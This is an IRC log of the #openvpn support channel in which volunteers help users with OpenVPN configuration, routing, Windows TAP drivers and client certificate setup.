BasicXP: my general SOP is to keep spaces out of CN 09:09 <@ecrist> also filesnames 09:09 <+pekster> BasicXP: The exact section you need is titled 'String Types and Remapping' 09:09 < BasicXP> pekster: thank you, will look into it 09:10 < BasicXP> ecrist: the file name has a space, it was created with touch "Common Name" 09:10 <+pekster> It's not against X509 policy to use space, but for best ovpn ease of use you should stick to the standard characters, or use the advanced option to avoid remapping (and write any code you use in hooks/scsripts very carefull to avoid quoting bugs) 09:10 <@ecrist> BasicXP: you can do whatever you want, it's generally a good practice to keep spaces out of file names, though 09:10 <+rob0> ah, look like you wanted "Common_Name" 09:11 <+pekster> well, or the --no-name-remapping option (depending on usecase and level of comfort managing potential string escapes if custom scripts are involved) 09:11 <+pekster> Nothing says trouble like the boss wanting to know why an attacker was able to exploit your VPN login ;) 09:13 < BasicXP> it will be much easier to rename the client config file for me, replacing a space with an underscore 09:13 < BasicXP> let me try it out 09:14 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 09:15 < BasicXP> that did the trick, thank you all very much for help! really appreciate it. 09:19 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Quit: Have to go. Good bye!] 09:32 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:40 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 09:44 -!- samba35 [~shrikant@unaffiliated/samba35] has quit [Ping timeout: 256 seconds] 09:46 -!- desmo [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has left #openvpn [] 09:57 -!- samba35 [~shrikant@219.64.91.253] has joined #openvpn 10:06 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds] 10:07 < kjs> Is there a way to set a route client side? 10:08 < kjs> in the ovpn file ? 10:08 <+pekster> Yup, via the 'route' directive 10:08 < kjs> route 10.255.0.0/24 10.25.8.69 ? 10:09 <+pekster> You need the netmask as its own separate parameter (see --route in the manpage for usage) 10:09 <+pekster> But yes, that's the premise 10:09 < kjs> route 10.255.0.0 255.255.555.0 10.25.8.69 10:09 <+pekster> Normally you don't use the IP since it'll be determined as your peer endpoint 10:10 <+pekster> You've got some variables availble too to define common IPs based on your connection context 10:12 < kjs> k thanks 10:18 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 260 seconds] 10:22 -!- master_of_master [~master_of@p57B55F39.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 10:23 -!- master_of_master [~master_of@p57B53191.dip.t-dialin.net] has joined #openvpn 10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 10:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:36 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 10:39 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 272 seconds] 10:41 -!- izibi [~julian@unaffiliated/izibi] has left #openvpn [] 10:44 -!- corretico [~luis@190.211.93.38] has joined #openvpn 10:48 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:49 -!- lurpy [~test003@soho-94-143-249-78.sohonet.co.uk] has quit [Quit: leaving] 10:53 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has quit [Ping timeout: 248 seconds] 10:57 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 11:00 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:00 -!- mode/#openvpn [+v s7r] by ChanServ 11:03 -!- raidz_away is now known as raidz 11:04 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:08 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 11:09 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 260 seconds] 11:10 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 11:14 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has quit [Quit: Computer has gone to sleep.] 11:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 11:19 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]] 11:20 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:26 -!- RAWR254 [~androirc@71.36.146.65] has joined #openvpn 11:28 < RAWR254> Morning folks. I have a question. I have a router that needs ipv6 support over openvpn. Is there a 2.3.0 mips build out or would i have to compile it? 11:28 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 11:28 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer] 11:29 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 11:30 < RAWR254> Latest build i have found seems to be 2.2.2 for mipsel 11:33 < RAWR254> Mind you i cant do a dev tap due to the other end being a vps 11:34 <+pekster> RAWR254: Someone was here a week or so ago that mentioned some build issues for 2.3.0 under mips (OpenWRT I think, or maybe dd-wrt.) I'm not aware of a 2.3.x branch build for a mips platform, but I haven't really looked that hard personally 11:34 <+pekster> If you get it working, I'm sure the *WRT and/or openvpn mailing list would be interested to hear how you resolved any issues that popped up 11:35 < RAWR254> Pekster: if i cant get the ipv6 over dev tun to work, is it possible to use dev tap to link a router to a vps server? 11:36 <+pekster> Yea, and then serve IPv6 over the Ethernet link 11:37 <+pekster> There are a set of IPv6 patches to some of the 2.2.x branches too, but I'm not sure if any potential build issues are with IPv6 specifically, or other 2.3 branch stuff 11:37 < RAWR254> Awesome! Here i was thinking i couldnt because the vps only has the global ip on eth0 11:37 <+pekster> I'm not really the guy to ask about specifics, so I'm just passing on what I've heard 11:37 <+pekster> Sadly, I'm stuck on the IPv4-only Internet, for now 11:38 < RAWR254> My vps has a he.net tunnel 11:38 < RAWR254> So ipv6 is going to blow 11:38 <+pekster> I do have a nice fancy fe00::/8 network though ;) 11:38 < RAWR254> But oh well 11:38 <+pekster> ff* 11:39 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:39 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:39 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:40 < RAWR254> Pekster: doesnt tap bridge interfaces so that my local network would show up on the network that eth0 is on? 11:40 <+pekster> Rigiht 11:40 <+pekster> It operates similar to how a physical network switch would 11:41 <+pekster> You need to configure the bridge at the OS level; eg: Linux uses a 'br0' interface and you manage it with brctl to add eth0 and tap0, for instance 11:42 < RAWR254> I dunno if the datacenter would like a 192.168.x.x network showing up 11:42 <+pekster> The client needs an IP valid on the target network 11:42 <+pekster> Just like if you put a random machine on your home LAN with 10.50.100.7/24, it's not going to magically work unless you have a gateway on that same subnet also on your home LAN 11:43 < RAWR254> well that poses an issue 11:43 <+pekster> To use a tap device with the rest of the IP-Internet, you still need an IP and a gateway and such 11:43 <+pekster> think of tap like a "really big virtual Ethernet cable" 11:43 <+pekster> And that's it 11:43 < RAWR254> Guess ill have to look at a tun ipv6 patch 11:44 <+pekster> (ovpn can manage a virtual IP network for you too on top of tap, but the low-level tap device is still just emulating Ethernet under the hood) 11:45 <+pekster> I'm not sure what the problems the last person to play with 2.3.x under MIPS were; your luck may vary if you're familiar with building code and aren't afraid to look into any errors you might get 11:45 <+pekster> For all I know they're fairly simple, but I don't need IPv6 on my OpenWRT openvpn setup, so I'm happy to use whatever the feeds provides for a version :P 11:48 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 11:49 -!- RAWR254 [~androirc@71.36.146.65] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )] 11:49 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 11:49 < Valcorb> Hello,, can anyone help me? 11:50 < Valcorb> i need to install a second tap driver 11:50 < Valcorb> but i can't find tapinstall.exe in the bin folder 11:50 <+pekster> Valcorb: What openvpn version? 11:50 < Valcorb> 2.3.0 11:50 <+pekster> In your install root, you should have a .\bin\tap-windows.exe 11:50 <+pekster> Run that, and select the optional 'Utilities' checkbox 11:51 <+pekster> Then in the install dir for the TAP-Win32 folder, you'll get the usual addtap.bat and deltapall.bat files 11:51 < Valcorb> Hmm, i can't find the file 11:51 < Valcorb> http://i.imgur.com/dE3H3.png 11:52 <+pekster> Valcorb: Weird. Well, break open the openvpn installer you downloaded with 7-zip and you can find it in the .\$TEMP\ path too 11:53 <+pekster> I'm using the 64-bit 2.3.0 official release, but I *though* I teseted it and saw the tap-windows.exe thing there. Maybe I was mistaken, or maybe it was installed as an optional component I checked during install 11:53 <+pekster> thought* 11:53 < Valcorb> hmm 11:54 <+pekster> 7-zip should get it for you either way since it's part of the release download 11:54 < Valcorb> yeah 11:54 < Valcorb> lemme get 7zip 11:54 < Valcorb> one sec 11:56 <+pekster> Now I'm curious enough to get my dusty XP-32-bit VM updated to try a generic install of 2.3.0 to see what happens 11:59 < Valcorb> pekster, thanks, that fixed it 11:59 < Valcorb> it sohuld work 11:59 < Valcorb> if its compatible with XP 11:59 < Valcorb> lol 11:59 <+pekster> Well, I want to see if that tap-windows.exe is installed by default using only default installer options in the \bin\ dir 12:00 < Valcorb> oh i c 12:00 <+pekster> It's still a hassle that between 2.2 and 2.3 the 2 batch files were removed from the tap-win32 installation 12:00 <+pekster> I mean, the driver and tapinstall.exe are still there, but not the frontend scripts and ini file to actaully do it from userland 12:03 < Valcorb> yeah 12:03 < Valcorb> i noticed 12:06 <+pekster> Interesting, the file I referenced is not there post-install on 32-bit, even with all the optional stuff checkced 12:06 <+pekster> Further, the build of the openvpn installer is not current with the git master becuase it's clearly missing the extra command-line value to install the utilities by default: 12:06 <+pekster> "C:\DOCUME~1\Josh\LOCALS~1\Temp\tap-windows.exe" /S 12:07 <+pekster> /S is for a silent NSIS install, but it's missing the /SELECT_UTILITIES value 12:07 <+pekster> Looks like a build issue then 12:07 <+pekster> I'll verify what I just stated in the code, then email the dev mailing list; hopefully 2.3.1 can fix that 12:08 < Valcorb> yeah 12:08 < Valcorb> p much 12:08 <+pekster> Thanks for stopping by; I looked a bit at the code, but not quite enough to fully track down the installation dissrepency against what I saw in it 12:08 <+pekster> Now I have the info I should need to generate a proper bugreport ;) 12:09 <+pekster> Valcorb: Are you on a 32 or 64 bit OS? 12:09 < Valcorb> 64 bit 12:09 < Valcorb> windows 8 12:09 < Valcorb> i'd love to get win7 12:09 < Valcorb> tho 12:10 <+pekster> classicshell.sf.net if you want your precious start menu back (open-source project too) 12:10 < Valcorb> Yeah i saw it 12:10 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn 12:10 < Valcorb> i got the windowblinds tool 12:11 -!- josheee12 [~jsteiner@131.91.7.1] has joined #openvpn 12:12 -!- josheee12 [~jsteiner@131.91.7.1] has left #openvpn [] 12:18 < kjs> Buy a mac... 12:33 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Connection reset by peer] 12:39 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 260 seconds] 12:56 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Quit: Ex-Chat] 13:15 -!- Freeaqingme [~Freeaqing@91.214.168.110] has joined #openvpn 13:15 < Freeaqingme> Hi. Is it possible to forward all web traffic to my vpn, without the redirect-gateway option being pushed by the server itself? (on some clients I do want to redirect, on others I dont) 13:16 <+pekster> Freeaqingme: You can push that from the server in a ccd file or via a --client-connect script 13:17 <+pekster> Optionally, the client itself can specify 'redirect-gateway' locally, or you can do the equivelent route operations by hand or by script on the client end too 13:29 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 272 seconds] 13:31 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn 13:33 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 13:36 -!- else- [~else@towely.iodev.org] has joined #openvpn 13:36 < else-> is it possible to push routes in p2p-mode? 13:38 <+pekster> else-: No, you can't use the --client or --pull directives outside of the multi-client mode 13:38 < else-> ok, thanks! 13:40 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:41 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:44 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:46 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 13:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 13:49 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 13:49 -!- samba35 [~shrikant@219.64.91.253] has quit [Remote host closed the connection] 13:51 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn 14:02 -!- brute11k1 [~brute11k@89.249.230.101] has joined #openvpn 14:03 -!- brute11k [~brute11k@89.249.231.136] has quit [Ping timeout: 256 seconds] 14:09 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 14:19 -!- Orbi [~opera@anon-149-82.vpn.ipredator.se] has joined #openvpn 14:42 -!- Porkepix [~Porkepix@lns-bzn-20-82-64-31-107.adsl.proxad.net] has joined #openvpn 14:54 < Freeaqingme> pekster, Thanks, works! 14:54 <+pekster> :) 15:26 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Read error: Operation timed out] 15:27 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 15:56 -!- cutaliviu [~liviusfus@79.118.219.39] has joined #openvpn 15:56 -!- cutaliviu [~liviusfus@79.118.219.39] has quit [Client Quit] 16:01 -!- cutaliviu [~cutaliviu@79.118.219.39] has joined #openvpn 16:02 -!- dazo is now known as dazo_afk 16:08 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 16:30 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:31 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 246 seconds] 16:48 -!- p3rror [~mezgani@41.249.102.205] has joined #openvpn 16:53 -!- p3rror [~mezgani@41.249.102.205] has quit [Ping timeout: 245 seconds] 16:58 -!- cutaliviu [~cutaliviu@79.118.219.39] has quit [] 17:05 -!- p3rror [~mezgani@41.249.83.35] has joined #openvpn 17:20 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 17:25 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [] 17:33 -!- p3rror [~mezgani@41.249.83.35] has quit [Ping timeout: 245 seconds] 17:48 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 17:52 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 18:04 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 18:16 -!- s7r [~s7r@openvpn/user/s7r] has quit [Read error: Connection reset by peer] 18:16 -!- AlbinoGeek [AcademyInt@academyintl/director/AcademyIntl] has joined #openvpn 18:16 < AlbinoGeek> !logs 18:16 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 18:17 < AlbinoGeek> !logfile 18:17 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 18:19 < AlbinoGeek> :) That fixed everything. 18:19 < AlbinoGeek> Oh how wonderful it is when channels have USEFUL topics... 18:19 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Quit: ZNC - http://znc.in] 18:19 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 18:20 -!- raidz [~raidz@raidz.im] has joined #openvpn 18:20 -!- raidz [~raidz@raidz.im] has quit [Changing host] 18:20 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 18:20 -!- mode/#openvpn [+o raidz] by ChanServ 18:20 -!- mattock [~mattock@raidz.im] has joined #openvpn 18:20 -!- mattock [~mattock@raidz.im] has quit [Changing host] 18:20 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 18:20 -!- mode/#openvpn [+o mattock] by ChanServ 18:20 < AlbinoGeek> Now that I've configured and successfully started OpenVPN server v2.3.x on my CentOS 5 box, and iptables forwarded (with masquarade) the private section; with ipforward enabled in sysctl.. how do I go about configuring the client? 18:21 < AlbinoGeek> I'm guessing OpenVPN requires the OpenVPN client ; (doesn't emulate PPTP/SSTP/any VPN that windows natively supports.) 18:24 < EugeneKay> It's the same `openvpn` binary whether you're in --server or --client mode 18:25 < EugeneKay> In any case, yes, you need to download the openvpn for windows app 18:25 < EugeneKay> !download 18:25 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 18:25 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 18:25 < EugeneKay> This installs a special TUN/TAP device(as a network adapter) and handles the magic of routing tables, etc 18:28 < EugeneKay> You built 2.3.0 for CentOS5? You can just get a package for it, though it'll be the older 2.2(I think... might be 2.1 still) 18:28 < EugeneKay> Most sane people have updated to 6 anyway 18:30 < AlbinoGeek> EugeneKay: Thank you. In the case of the Linux, I built everything myself and got everything working. It was nice. 18:30 < AlbinoGeek> But yeah, as per the Windows version I didn't know what to do. 18:31 < AlbinoGeek> Linux always "just works"; I don't get how people stand Windows 18:31 < EugeneKay> It works fine for me :-p 18:31 < EugeneKay> I've messed with my registry far less than I used to argue with xorg.conf 18:31 < AlbinoGeek> EugeneKay: I avoid X :) 18:31 < EugeneKay> I also have 6 monitors, and half the displays are powered by hardware that doesn't have linux drivers AT ALL, so.... 18:32 < AlbinoGeek> EugeneKay: But yeah, with Windows... the builtin VPN adapter was the only one I could get working for the longest time.. 18:32 < AlbinoGeek> But then suddenly PTTPD (PoPToP) stopped being updated / working on linxu anymore. so I had to move to OpenVPN finally 18:32 < EugeneKay> The openvpn installer does it's thing 18:32 -!- UberDuper [~UberDuper@wsip-174-77-66-158.ph.ph.cox.net] has left #openvpn [] 18:32 < EugeneKay> The only caveat is that you need to start the GUI bit as Admin 18:32 < AlbinoGeek> EugeneKay: Yes, but OpenVPN GUI won't open :) 18:32 < AlbinoGeek> And I have UAC disabled before you ask. 18:33 < EugeneKay> Are you feeding it a config file? 18:33 < AlbinoGeek> EugeneKay: Well no, it's a GUI. I just started it from the start menu; and it's done nothing; no window, no file open dialog, no configuration, no tray icon, etc. 18:34 < EugeneKay> Aha. 18:34 < EugeneKay> !ovpn 18:34 <@vpnHelper> "ovpn" is (#1) OpenVPN GUI will load config files with a .ovpn extension when double-clicked. or (#2) this is the same config file format as the standard .conf , just renamed to prevent extension collisions on Windows 18:34 < AlbinoGeek> I'm sitting in the config-file directory atm, but yeah. 18:34 < EugeneKay> Create a config file, name it foo.ovpn 18:34 < EugeneKay> Right click it and run 18:34 < AlbinoGeek> What's the default file loaded by the GUI ? 18:34 < EugeneKay> No clue. 18:34 < AlbinoGeek> ie: default.ovpn or something like that? 18:34 < AlbinoGeek> As it appears to have loaded something, TUN is up and running. 18:34 < EugeneKay> I know that if you use the Service it will load c:\ 18:35 < EugeneKay> c:\Program Files (x86)\Openvpn\config\ or so 18:35 < EugeneKay> (I'm on my desktop, which doesn't have openvpn installed) 18:35 < AlbinoGeek> C:\Program Files\OpenVPN\config 18:35 < EugeneKay> Sounds right 18:35 < AlbinoGeek> Well, I'm here; but what's the default file's NAME ? 18:36 < EugeneKay> AFAIK it's just whatever is in that directory; but this is for the Service. I don't think invoking the GUI by itself does anything 18:36 < EugeneKay> There should be a tray icon you cna interact with 18:36 < EugeneKay> Try running 18:36 < EugeneKay> !win_shortcut 18:36 < AlbinoGeek> Yeah, the tray icon is pretty useless. "Settings / Exit" Settings shows proxy settings, and nothing else. 18:36 < EugeneKay> !winshortcut 18:36 <@vpnHelper> "winshortcut" is To start OpenVPN-GUI easily on Windows, make a shortcut and set the Target as: \"C:\Program Files (x86)\OpenVPN\bin\openvpn-gui-1.0.3.exe\" --config_dir \"C:\path\to\config\" --connect client.ovpn --show_balloon 0 --silent_connection 1 --show_script_window 0 18:36 < EugeneKay> That isn't \"ed right, but you get the idea 18:37 < EugeneKay> I typically put my config files in c:\Users\eugene\openvpn\, rather than in the Program Files\config dir 18:37 < AlbinoGeek> Okay so let's see... time to copy server config into client config (as per tun/tap etc) 18:37 < EugeneKay> (I kepe UAC enabled) 18:37 < EugeneKay> Yup, make up a standard client config file 18:37 < AlbinoGeek> Server is running... tun, alright. What else needs to be the same? Port obvs. 18:37 < AlbinoGeek> Proto set 18:38 < EugeneKay> Off the top of my head.... remote, rport, tls-client, ca, cert, key, pull 18:38 < EugeneKay> Those are the minimum settings 18:38 < EugeneKay> Oh, and proto 18:38 < AlbinoGeek> So what, download ca.crt from the server, and gen a client certificate ? 18:39 < AlbinoGeek> Because ca cert and key both say "client" in this config, but should they be the same keys as the server? (this is really odd to me, standard RSA just has you get a private key...) 18:39 < EugeneKay> Ya, you need to have a client.key and client.crt, if you're doing cert-based auth(the default and sane thing) 18:39 < AlbinoGeek> My server is a proper CA, so creating an RSA certificate for the OpenVPN server was easy, but what do I put on the client now? 18:39 < EugeneKay> No, you should have separate keys/certs for each machine in the setup 18:40 < AlbinoGeek> Uhh what? 18:40 < EugeneKay> Insteading of specifying the TLS Server extension in openssl you specify TLS Client 18:40 < EugeneKay> One CA; many different certs. 18:40 < AlbinoGeek> Yeah see, now you've lost me. In standard tunneled SSL connections (such as NX, SSH, etc) I generate a certificate on the server, then get myself a copy of the certificate on my local machine, the server keeping the private key. 18:41 < EugeneKay> Yeah, this is different 18:41 < AlbinoGeek> Then that being the authenticator :x 18:41 < EugeneKay> BOTH ends verify the identity of the other against the CA 18:41 < AlbinoGeek> Yeah, well now I have no idea; because OpenSSL-rsakeygen doesn't run on this box at all (Windows). So how would I even gene a cert here? 18:41 < EugeneKay> It's akin to how cert-based email works. You have a client cert and a server cert, both are checked. 18:41 < EugeneKay> Typically you gen on the server(or elsewhere) and then SCP it 18:42 < EugeneKay> !xca 18:42 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 18:42 < EugeneKay> That works on Windows, if you really want to do proepr CSRs, but it's more pain than it's worth IMO 18:42 < AlbinoGeek> Well, easy-rsa isn't an issue; I can generate a second cert on the server if that's all I have to do.. but yeah. 18:42 < EugeneKay> Just easy-rsa on the server, SCP+delete from server 18:42 < AlbinoGeek> EugeneKay: Well, my server is a proper CA; so I do have to do the CSR / etc to get the key. 18:42 < AlbinoGeek> Does OpenVPN respect CRL by the way? 18:42 < EugeneKay> Yup, --crl option 18:43 < AlbinoGeek> Ahh good. 18:43 < EugeneKay> I believe it expects DER format, but don't quote me on that 18:43 < AlbinoGeek> Ehh, the CA spits out CRL in all formats; so it shouldn't be an issue. 18:43 < EugeneKay> I'm guessing you're talking about the red hat CA tools? 18:44 < AlbinoGeek> EugeneKay: inhouse software. 18:44 < EugeneKay> Ah, fun 18:44 < AlbinoGeek> So, in keys on the server I have... hundreds of files, wtf did easy-rsa do:x 18:44 < EugeneKay> easy-rsa has a ./build-req command that you can use 18:45 < AlbinoGeek> This is what confuses me though ,following to this point a guide on https://safesrv.net/install-openvpn-on-centos/ 18:45 <@vpnHelper> Title: SafeSrv Installing OpenVPN on CentOS 5 and CentOS 6 (at safesrv.net) 18:45 < EugeneKay> Guides are useless :-p 18:45 < AlbinoGeek> They do not specify key or cert on the client, only the CA 18:45 < AlbinoGeek> Then they use linux system login 18:46 < AlbinoGeek> The only different lines in client they specify are: ca ca.crt auth-user-pass comp-lzo reneg-sec 0 verb 3 18:46 < EugeneKay> Yeah, client-cert-not-required 18:46 < AlbinoGeek> EugeneKay: client-cert-not-required isn't specified on the server. 18:46 < EugeneKay> In their guide it is 18:46 < EugeneKay> Which is a terrible idea 18:46 < AlbinoGeek> Nevermind, I saw it. 18:46 < EugeneKay> !howto 18:46 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 18:47 < EugeneKay> That's the only thing we really support here, guide-wise ^ 18:47 < AlbinoGeek> Welp, OpenVPNs "derp I need to authorize myself" seems pretty terrible so far... 18:47 < AlbinoGeek> http://www.secure-computing.net/openvpn/howto.php <-- I was there 18:47 <@vpnHelper> Title: SCN: OpenVPN IRC Channel Policy (at www.secure-computing.net) 18:47 < AlbinoGeek> Note how it has no steps as such as "here are some things you need to consider" 18:47 < EugeneKay> Same thing 18:47 < AlbinoGeek> Which was nice, but yeah 18:47 < EugeneKay> Yeah, that doc could use righting 18:48 < EugeneKay> writing 18:48 < AlbinoGeek> (not to mention half the commands are only there for Windows servers... which is terrible) 18:48 < EugeneKay> Brb, need more booze, and to play with fire 18:48 < AlbinoGeek> Heh, Windows Server ^ 18:51 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 18:52 < AlbinoGeek> Right so, I need to install the CA.CRT on all client machines; and distribute to each client a pair of crt/key client files 19:01 < EugeneKay> Correct 19:09 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Ping timeout: 256 seconds] 19:09 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 19:18 < AlbinoGeek> EugeneKay: Yeah... if I rewrite this docs here to actually be useful and less technical, who would I go about submitting it to to be reviewed or used somewhere here? 19:19 < AlbinoGeek> Because yeah, these docs have a lot of things that just confuse people, a lot of parts you go to that don't stream into any other points, "orphaned" or "deadend" pages everywhere. 19:19 < AlbinoGeek> It's hard to follow 19:19 < EugeneKay> !wiki 19:19 <@vpnHelper> "wiki" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN for the Unofficial wiki or (#2) https://community.openvpn.net/openvpn/wiki for the Official wiki 19:19 < EugeneKay> Write it up on the official wiki and we can add/edit the bot factoids as needed 19:19 < EugeneKay> A list of "gotchas" and things to consider would be a good start 19:20 < AlbinoGeek> Like, even the CORE things on this documentation are wrong. 19:20 < AlbinoGeek> Such as the location of the "docs" folder on your system. 19:20 < EugeneKay> That's highly build-dependant :-p 19:20 < EugeneKay> !dev 19:20 <@vpnHelper> "dev" is https://lists.sourceforge.net/lists/listinfo/openvpn-devel to sign up for devel mail list 19:21 < EugeneKay> Eh, not what I was after 19:21 < AlbinoGeek> EugeneKay: Perhaps, but " /usr/share/doc/openvpn-2.0" doesn't help any redhat person, since /usr/local/share is used for docs. Somewhere OpenVPN didn't even put its docs. 19:21 < AlbinoGeek> On my system, OpenVPN didn't even comes with docs. None in the tar, none in the RPM, none even with yum. 19:21 < EugeneKay> In the packages it is in /usr/share/openvpn/ 19:21 < AlbinoGeek> So.. when the guide references "default config" there are none. 19:22 < AlbinoGeek> EugeneKay: Nope 19:22 < EugeneKay> It is in.... well, lemme see which package this is 19:22 < AlbinoGeek> EugeneKay: /usr/share/openvpn/plugins/lib/ only has two files 19:22 < AlbinoGeek> And that's literally the only thing there. 19:22 < AlbinoGeek> :P 19:22 < EugeneKay> In any case, this is more of a #openvpn-devel question 19:23 < EugeneKay> If you're willing to take on these things and genuinely make it better I'm sure they'll accept your work 19:23 < EugeneKay> But it's a non-trivial thing :-p 19:23 < EugeneKay> I personally only care as far as getting people up & running 19:23 < EugeneKay> The openvpn package I use is from EPEL 19:23 < AlbinoGeek> ^ It's not that hard, writing technical documents is something I have to do quite often, and there's nothing technical about a technical document you submit to computer illiterate people (something I do quite frequently.) 19:23 < AlbinoGeek> :P 19:23 < EugeneKay> I'm on a Scientific Linux 6 system 19:23 < AlbinoGeek> Ahh 19:24 < AlbinoGeek> Scientific Linux 6 being the only sane rhel6 core 19:24 < EugeneKay> Repoforge also provides an openvpn rpm, through 2.2.2 19:24 < EugeneKay> But I only use them when I HAVE to. 19:24 < AlbinoGeek> EugeneKay: 2.3 has many nice features I needed. 19:24 < AlbinoGeek> And compiling something is trivial in linux. 19:24 < EugeneKay> I haven't bothered to rebuild the srpm with 2.3 yet 19:25 < EugeneKay> I don't need ipv6 tunneling, though I ought to 19:25 < AlbinoGeek> wget url; tar xfz file; ./configure; make; make docs; make install 19:25 < AlbinoGeek> Rebuilding the RPM actually failed for me on rhel5. No error. 19:25 < EugeneKay> I won't judge CentOS vs SL; aside from the fact that SL6 was released months before CentOS6(the reason I moved over) 19:25 < AlbinoGeek> So I just compiled it. 19:25 < EugeneKay> I prefer to stay within the package manager when possible 19:25 < EugeneKay> It helps with sanity 19:25 < AlbinoGeek> Hmm, what is one of the default doc files names 